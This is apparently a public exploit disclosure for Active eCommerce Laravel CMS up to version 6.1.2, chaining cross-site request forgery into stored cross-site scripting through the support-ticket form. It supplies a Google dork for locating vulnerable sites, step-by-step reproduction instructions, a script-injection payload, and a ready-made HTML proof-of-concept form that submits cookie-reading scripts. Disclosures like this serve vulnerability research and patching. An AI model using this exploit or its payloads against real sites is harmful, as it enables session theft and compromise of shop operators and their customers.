# Exploit Title: Active eCommerce Laravel CMS 5.x to 6.1.2 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)
# Date: 25/11/2021
# Exploit Author: Keyvan Hardani
# Google Dork: intext:|| WHOPPS!!!THIS IS PIRATED COPY OF ACTIVE ECOMMERCE CMS
# Vendor Homepage: https://activeitzone.com/
# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405
# Version: up to 6.1.2
# Tested on: Windows 10, Kali Linux, Burp Suite
Steps to Reproduce:
1. At first login as customer to the site
2. then click the navigation bar and open "Support Ticket"
3. search for Token ( _token ) on source code and copy the value
4. Option 1: save the script as html and paste the _token into token field and hit submit
5. Option 2: use XSS payload </textarea><script>alert(document.domain)</script> in Description or subject value on support ticket.
5. Now Generate a CSRF POC
More info & Video:
https://github.com/Keyvanhardani/Active-eCommerce-Laravel-CMS-5.5.2-Cross-Site-request-forgery-CSRF-to-Cross-site-Scripting-XSS
Proof of Concept:
<!DOCTYPE html>
<html>
<body>
<form action="https://site.com/ecommerce/support_ticket" method="POST">
<input type="text" name="_token" value="gShF0bUHgMjfSmO7sqd5J5mSzvXJFnB0qeEmc6vD" placeholder="input the token and submit the form">
<input type="hidden" name="subject" value="test<script>alert(document.cookie)</script>">
<input type="hidden" name="details" value="test<script>alert(document.cookie)</script>">
<input type="hidden" name="attachments" class="selected-files">
<input type="submit" value="submit">
</form>
</body>
</html>
DISCLAIMER: This exploit is for testing and educational purposes only. Any other usage for this code is not allowed. Use it at your own risk.